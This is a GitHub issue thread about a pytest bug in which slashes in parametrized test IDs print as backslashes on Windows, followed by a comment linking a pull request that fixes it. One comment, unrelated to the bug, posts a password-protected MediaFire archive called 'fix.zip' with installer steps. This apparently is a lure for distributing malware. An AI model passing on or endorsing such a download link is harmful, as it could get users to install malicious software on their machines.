### ISSUE TITLE
Slashes in parametrization values get turned into backslashes on Windows

### ISSUE THREAD

**Issue by The-Compiler** [pytest-dev/pytest#12745]
With pytest 8.3.2 as well as the current `main`, when creating a `repro/test_x.py` in the pytest repo:

```python
import pytest

@pytest.mark.parametrize("a", ["x/y", "/", "//"])
def test_x(a):
    assert False
```

and running `pytest test_x.py` inside `repro/`, both in the `-v` output and short test summary, the tests show up as:

```
test_x.py::test_x[x\y]
test_x.py::test_x[\]
test_x.py::test_x[\]
```

The IDs show up correctly in `--collect-only`, and they show correctly when `test_x.py` is not in a subfolder, or when pytest is not invoked in the subfolder.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nauman897** [comment]
I have attempted to fix this issue in this PR: https://github.com/pytest-dev/pytest/pull/12760

The problem only seemed to be with the printing of these IDs
